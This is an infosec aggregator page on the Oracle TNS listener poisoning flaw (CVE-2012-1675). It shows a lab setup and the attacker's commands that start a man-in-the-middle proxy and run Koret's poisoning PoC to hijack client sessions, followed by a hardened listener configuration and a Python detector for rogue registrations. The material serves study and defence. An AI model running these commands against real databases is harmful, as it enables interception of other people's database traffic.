Description:
Timeline :
Vulnerability discovered by Joxean Koret in 2008
Vulnerability reported to the vendor by Joxean Koret in 2008
Public release of the vulnerability by the vendor in the Oracle CPU of 2012-04-17
Details and PoC of the vulnerability released by Joxean Koret on 2012-04-18
Fake (incomplete) patching of the vulnerability discovered by Joxean Koret on 2012-04-26
PoC provided by:
Joxean Koret
Reference(s) :
Oracle CPU of April 2012
CVE-2012-1675
Affected versions : All versions of Oracle Database
Tested with Oracle Database 10g Enterprise Edition Release 10.2.0.4.0
Description :
Using Joxean Koret's PoC requires that the database name is exactly 6 characters long.
Database server characteristics :
IP : 192.168.178.150
Oracle version : 10.2.0.4.0
Database listener port : 1521
Database listener has no client IP restrictions (any host can connect to and register with it)
Database name : arcsig
Database username : arcsig
Database password : testtest
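The listener above accepts instance registration from any TCP peer, which is the condition the poisoning PoC relies on. As an added example (not from the video, the PoC, or Oracle's own material), the listener.ora fragment below shows that default beside the restriction Oracle documented for this issue: COST (SECURE_REGISTER_listener_name) so that registrations are accepted only over the local IPC endpoint, and, on releases that support it (11.2.0.4 and later), VALID_NODE_CHECKING_REGISTRATION_listener_name. The listener name LISTENER, the IPC key, and the availability of COST on the tested 10.2.0.4 patch level are assumptions.

```text
# Weak (default): dynamic registration accepted from any host that can
# reach TCP/1521, so a remote "instance" can register the arcsig service.
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
    )
  )

# Hardened: add a local IPC endpoint and restrict registration to it (COST),
# plus valid-node checking for registration where the release supports it.
# Assumed names: LISTENER, LISTENER_IPC.
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = IPC)(KEY = LISTENER_IPC))
      (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
    )
  )
SECURE_REGISTER_LISTENER = (IPC)
VALID_NODE_CHECKING_REGISTRATION_LISTENER = ON
```

With SECURE_REGISTER_LISTENER set to (IPC), the real instance must also register over IPC, so its LOCAL_LISTENER parameter has to resolve to the IPC address rather than the TCP one; otherwise the legitimate instance is locked out along with the attacker.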
Database client characteristics :
IP : 192.168.178.151
SQL*Plus version : 10.2.0.4.0
tnsnames.ora file as below :
TARGET.DB =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
    (CONNECT_DATA = (SERVICE_NAME = arcsig))
  )
Attacker characteristics :
IP : 192.168.178.100
Usage of PoC provided by Joxean Koret
Demonstration :
PoC validation phase
On database server :
ifconfig
On database client :
ifconfig
sqlplus -v
cat tnsnames.ora
sqlplus arcsig@TARGET.DB
HELP
QUIT
PoC exploitation phase
On attacker :
Start the MITM proxy, which will intercept the communication between the client and the database :
sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521
Start the vulnerability exploitation :
python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521
On the database client :
Connect with SQL*Plus
sqlplus arcsig@TARGET.DB
?
? INDEX
TOTO
QUIT
You can see that the communication is intercepted by the proxy: once the PoC has registered the attacker's host with the listener as an instance serving arcsig, new client connections to that service are handed to the attacker's proxy, which relays them to the real database.
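The registration step that makes the interception above possible is visible on the wire: the attacker sends the listener a TNS CONNECT packet whose connect string carries a SERVICE_REGISTER command, just as the real instance's PMON does from the database host. The following detector is an added example, not Joxean Koret's PoC and not Oracle code. It parses the Oracle Net CONNECT packet far enough to pull out the connect string and flags registration commands from any host other than the database server. The header field values, the data offset of 58 and the sample capture are constructed; the SERVICE_REGISTER_NSGR command string follows Koret's write-up.

```python
"""Detect TNS instance-registration attempts from untrusted hosts.

Added example for the TNS listener poisoning demonstration; not Joxean
Koret's PoC and not Oracle code.  The constructed sample capture mirrors
the lab hosts: client .151, database .150, attacker .100.
"""
import re
import struct

TNS_TYPE_CONNECT = 1
# A registration request carries (COMMAND=SERVICE_REGISTER...) in its
# connect data; the NSGR suffix is the form described in Koret's paper.
REGISTER_RE = re.compile(rb"\(\s*COMMAND\s*=\s*SERVICE_REGISTER[^)]*\)", re.IGNORECASE)


def build_connect_packet(connect_data: bytes, data_offset: int = 58) -> bytes:
    """Build a TNS CONNECT packet carrying connect_data.

    Layout: 8-byte NS header (length, checksum, type, flags, header checksum),
    then the connect header, then the connect string at data_offset.
    Values other than the length/offset fields are representative defaults.
    """
    fixed = struct.pack(
        ">HHHHHHHHHHIBBII8s",
        0x013A, 0x012C,          # version, lowest compatible version
        0x0000,                  # service options
        2048, 32767,             # SDU, TDU
        0x7F08,                  # NT protocol characteristics
        0, 1,                    # line turnaround, "value of 1" byte-order probe
        len(connect_data), data_offset,
        2048,                    # max receivable connect data
        0x41, 0x41,              # connect flags 0/1
        0, 0,                    # trace cross-facility items
        b"\x00" * 8,             # trace unique connection id
    )
    pad = data_offset - 8 - len(fixed)
    if pad < 0:
        raise ValueError("data_offset too small for the connect header")
    body = fixed + b"\x00" * pad + connect_data
    header = struct.pack(">HHBBH", 8 + len(body), 0, TNS_TYPE_CONNECT, 0, 0)
    return header + body


def parse_tns_packet(pkt: bytes):
    """Return (packet_type, connect_data); connect_data is None unless CONNECT.

    Raises ValueError on truncated or inconsistent packets so the caller can
    decide whether to drop or log them.
    """
    if len(pkt) < 8:
        raise ValueError("short TNS header")
    length, _chk, ptype, _flags, _hchk = struct.unpack(">HHBBH", pkt[:8])
    if length != len(pkt):
        raise ValueError("length field %d does not match %d bytes" % (length, len(pkt)))
    if ptype != TNS_TYPE_CONNECT:
        return ptype, None
    if len(pkt) < 28:
        raise ValueError("short CONNECT header")
    data_len, data_off = struct.unpack(">HH", pkt[24:28])  # connect data length, offset
    if data_off + data_len > len(pkt):
        raise ValueError("connect data runs past end of packet")
    return ptype, pkt[data_off:data_off + data_len]


def is_registration(connect_data: bytes) -> bool:
    """True if the connect string is an instance registration command."""
    return REGISTER_RE.search(connect_data) is not None


def audit_connects(packets, trusted_registrars):
    """Scan (src_ip, raw_packet) pairs and return registration attempts from
    hosts outside trusted_registrars as (src_ip, connect_string) tuples.
    Malformed packets are skipped here; a real sensor would log them."""
    alerts = []
    for src, raw in packets:
        try:
            _ptype, cdata = parse_tns_packet(raw)
        except ValueError:
            continue
        if cdata is not None and is_registration(cdata) and src not in trusted_registrars:
            alerts.append((src, cdata.decode("ascii", "replace")))
    return alerts


# Constructed sample traffic: a normal client connect, the instance's own
# registration from the database host, the attacker's registration, and a
# truncated fragment that must not crash the detector.
TRUSTED_REGISTRARS = {"192.168.178.150"}
SAMPLE_CAPTURE = [
    ("192.168.178.151", build_connect_packet(
        b"(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.178.150)(PORT=1521))"
        b"(CONNECT_DATA=(SERVICE_NAME=arcsig)))")),
    ("192.168.178.150", build_connect_packet(
        b"(CONNECT_DATA=(COMMAND=SERVICE_REGISTER_NSGR))")),
    ("192.168.178.100", build_connect_packet(
        b"(CONNECT_DATA=(COMMAND=SERVICE_REGISTER_NSGR))")),
    ("192.168.178.100", b"\x00\x04\x00\x00"),
]

if __name__ == "__main__":
    for src, cstr in audit_connects(SAMPLE_CAPTURE, TRUSTED_REGISTRARS):
        print("ALERT: registration from untrusted host %s: %s" % (src, cstr))
```

Run against the sample capture, only the attacker's registration from 192.168.178.100 is reported; the client connect and the database host's own registration pass. The detector keys on the source address because the listener itself does not, which is exactly the gap the PoC exploits; with COST or valid-node checking enabled on the listener the same packet would be refused rather than merely noticed.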
More Info :- http://www.securitytube.net/video/3948
Tags: oracle, 0day, exploit, database
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Finally, a demonstration!! Also have a look at this document.
http://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CFwQFjAD&url=http%3A%2F%2Fwww.joxeankoret.com%2Fdownload%2Ftnspoison.pdf&ei=oWi3T-yYHcmtrAfM6PjOBw&usg=AFQjCNFpUzFW2TBfKs9IpHM-vKGRCI-Jiw&sig2=U-0h6Kkays6EQSUzyVRMYA
Thanks !
Very Useful Document.
Thanks tinitee !